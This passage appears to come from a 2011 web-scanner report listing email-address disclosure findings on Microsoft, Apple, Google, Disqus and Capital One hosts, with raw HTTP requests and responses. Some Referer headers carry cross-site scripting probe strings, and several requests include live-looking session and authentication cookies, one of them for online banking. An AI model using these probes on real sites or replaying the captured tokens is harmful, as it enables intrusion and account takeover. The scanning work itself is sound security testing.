)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

22.18. http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.social.s-msft.com
Path:	/Search/GlobalResources/Scripts/omni_rsid_social_min.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a HTTP/1.1
Host: i1.social.s-msft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Jul 2011 00:55:50 GMT
Accept-Ranges: bytes
ETag: "06f359d403ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB39
ntCoent-Length: 68126
Cache-Control: max-age=86400
Date: Sat, 23 Jul 2011 04:45:36 GMT
Content-Length: 68126
Connection: close
Vary: Accept-Encoding

var _om_gbls={omniGuidPath:"",version:"1107",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr:"",
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

22.19. http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.visualstudiogallery.msdn.s-msft.com
Path:	/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js?cver=0001 HTTP/1.1
Host: i1.visualstudiogallery.msdn.s-msft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 19:39:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
Server: GALS04
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=15457446
Date: Sat, 23 Jul 2011 02:01:13 GMT
Content-Length: 69304
Connection: close

var _om_gbls={omniGuidPath:"",version:"1107",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr:"",
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

22.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i2.msdn.microsoft.com
Path:	/Areas/Sto/Content/Scripts/mm/global.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /Areas/Sto/Content/Scripts/mm/global.js HTTP/1.1
Host: i2.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/devlabs/dd491992.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.NumberOfVisits=1&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=110&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=1296000
ntCoent-Length: 171383
Content-Type: application/javascript
Last-Modified: Wed, 13 Jul 2011 23:34:28 GMT
Accept-Ranges: bytes
ETag: "c5be7b68b541cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:02:08 GMT
Content-Length: 171383
Connection: close
Vary: Accept-Encoding

.../* * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

22.21. http://i2.msdn.microsoft.com/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i2.msdn.microsoft.com
Path:	/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js HTTP/1.1
Host: i2.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=15552000
Expires: Wed, 18 Jan 2012 10:17:32 GMT
Last-Modified: Wed, 13 Jul 2011 23:52:49 GMT
ETag: -866365250
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Type: text/javascript
X-AspNet-Version: 4.0.30319
ntCoent-Length: 71176
Content-Length: 71176
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 02:07:41 GMT
Connection: close

var _om_gbls={omniGuidPath:"",version:"1107",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr
...[SNIP]...
#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^
...[SNIP]...

22.22. http://i2.silverlight.net/scripts/omniture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i2.silverlight.net
Path:	/scripts/omniture.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /scripts/omniture.js?cdn_id=48751043 HTTP/1.1
Host: i2.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getting-started

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Jul 2011 19:10:17 GMT
Accept-Ranges: bytes
ETag: "f61117f4746cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: max-age=94305153
Date: Sat, 23 Jul 2011 04:46:42 GMT
Content-Length: 23434
Connection: close

// ------------------------------ omniture_rsid_slnet.js ------------------------------
var s_account = "msstoslvnet"; var omniGuidPath = "://www.silverlight.net/omniture/analyticsid.aspx"; if(windo
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

22.23. http://images.apple.com/global/scripts/lib/event_mixins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/event_mixins.js

Issue detail

The following email address was disclosed in the response:

seth.dillingham@gmail.com

Request

Response

22.24. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
X-Cache-TTL: 600
X-Cached-Time: Tue, 03 May 2011 12:39:23 GMT
nnCoection: close
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 118598
Cache-Control: max-age=404
Expires: Thu, 21 Jul 2011 20:46:38 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=hDmomXbMQsRadU9cPMxJrkN/jzvkplGD/8g/YY9DcrNDNOsDsfNYpdXc+PSAe8pKL3148F8JahURQeANXKJaR47XqClzVknGNNhHI334Qk1Tou0YL5Cl++LcGLTpfNrZ3ZXPpDGKYpxHZ2x/+hscAKp6izdxbPlgytOQYDngXK1vdgNlURLna2xGq9Kbfv9ZpTsmFWhZMfLxHGW6ruP1RmiScMeWfhvrEB7pT9xlIDvdEozdHXe9RlYZ7C3P3ASUyAXrBIfzI0xJVjfl5gmeu8Ap5hh/l9+zhpBiU+M8tbGbGQl39APtyHbKzpLP/6stVHbKK4h6SkCPyas4OdYcr07U6e3DPx6TsGk6Mo7abU6KXS/xIvk+1TvKn9J4HgGccanqicMWib2a93bv8t/+wCALrJm0gPyWB6MqG4j5lZNGa9xXJlTDfdl4XyEvc3EnP5LeEyuQa/8ZktyKYshL6g7AsksNy6oYaaWo1fEanUU+oi/0l17RgnasYxuxxP2VoSZE9mIdNhRTkz+WzBur+oE3MaMAw155I3T+NEFnUqjWhVHQZAPo2xoQKeg/z093; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

// script.aculo.us scriptaculous.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, f
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22.25. http://js.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.wlxrs.com
Path:	/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js

Issue detail

The following email address was disclosed in the response:

example555@hotmail.com

Request

GET /~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js HTTP/1.1
Host: js.wlxrs.com
Proxy-Connection: keep-alive
Referer: http://login.live.com/wlogin.srf?appid=000000004003CA5A&alg=wsignin1.0&appctx=%257e%252fUserInput%252fEditPublication
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Jul 2011 21:44:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Content-Length: 12004
Cache-Control: public, max-age=266478894
Expires: Wed, 01 Jan 2020 08:00:00 GMT
Date: Sat, 23 Jul 2011 02:05:06 GMT
Connection: close

/* Copyright (C) 2011 Microsoft Corporation */g_s["b24"]="sign in";g_s["a0"]="Cancel";g_s["a1"]="Click a Windows Live ID to sign in";g_s["a2"]="Retype your password";g_s["a3"]="Sign in with a partner
...[SNIP]...
correctly.";g_s["b25"]="Other Windows Live IDs";g_s["b52"]="Sign in with a Single use code";g_s["b54"]="Sign in with a Windows Live Hotmail ID";g_s["ii19"]="Password";g_s["ii12"]="Cancel";g_s["ii3"]="example555@hotmail.com";g_s["ii2"]="Windows Live ID:";g_s["ii13"]="Sign in with enhanced security. This may slow your browser speed.";g_s["ii14"]="Use enhanced security (SSL)";g_s["ii11"]="Sign in";g_s["ii9"]="Remember my p
...[SNIP]...
sword is incorrect. Please try again.";g_s["p21"]="Forget me";g_s["o11"]="Don't remember this Windows Live ID.";g_s["o1"]="Alert symbol";g_s["012"]="Sign-in options";g_s["y23"]="Partner ID";g_s["y3"]="example555@hotmail.com";g_s["y2"]="Windows Live ID:";g_s["y4"]="Password:";g_s["y5"]="Forgot your password?";g_s["y6"]="Messenger:";g_s["y8"]="Remember me";g_s["y10"]="Cancel";g_s["y12"]="Use enhanced security (SSL)";g_s["y
...[SNIP]...
gned in";g_s["y22"]="Please type your email address in the format yourname@example.com.";g_s["y0"]="Error symbol";g_s["y1"]="Generic Federation Error Message";g_s["dd35"]="Single use code";g_s["dd5"]="example555@hotmail.com";g_s["dd4"]="Windows Live ID:";g_s["dd6"]="Enter the code";g_s["dd7"]="Request a code";g_s["dd9"]="If you request a new single use code, the previous code won't work. Are you sure you want to refresh
...[SNIP]...

22.26. http://keepitfresh.frid.ge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://keepitfresh.frid.ge
Path:	/

Issue detail

The following email address was disclosed in the response:

repairman@frid.ge

Request

Response

22.27. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.gstatic.com
Path:	/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js

Issue detail

The following email address was disclosed in the response:

pat@gmail.com

Request

GET /cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js HTTP/1.1
Host: maps.gstatic.com
Proxy-Connection: keep-alive
Referer: http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=77+Stillman+Street,+San+Francisco,+CA&aq=0&sll=37.766207,-122.425258&sspn=0.017014,0.014763&ie=UTF8&hq=&hnear=77+Stillman+St,+San+Francisco,+California+94107&ll=37.78218,-122.395849&spn=0.013567,0.017252&z=14&iwloc=A&output=embed
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Thu, 21 Jul 2011 15:35:13 GMT
Date: Fri, 22 Jul 2011 01:36:00 GMT
Expires: Sat, 21 Jul 2012 01:36:00 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 81128
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 134243

__gjsload_maps2__('strr', 'GAddMessages({13828:"Sign in to use stars with",13829:"Sign in »",13830:"ex: pat@gmail.com",13831:"No account yet?",13832:"It\'s free and easy.",13833:"Create an account »",13338:"Seeing stars",13339:"When you star an item, it appears on your maps and is listed in My Maps.<br />
...[SNIP]...

22.28. http://mediacdn.disqus.com/1311185431/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311185431/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

anton@disqus.com

Request

Response

22.29. http://mediacdn.disqus.com/1311376479/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311376479/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

anton@disqus.com

Request

Response

22.30. https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Enrollment.aspx

Issue detail

The following email address was disclosed in the response:

yourname@yourisp.com

Request

POST /CapitalOne/Enrollment.aspx HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx
Content-Length: 9658
Cache-Control: max-age=0
Origin: https://onlinebanking.capitalone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; InSession=1; ASP.NET_SessionId=tdebhuarnmfb3tqbu5ydtk45; ssotgt=f2eos; VS_COOKIE=Login; 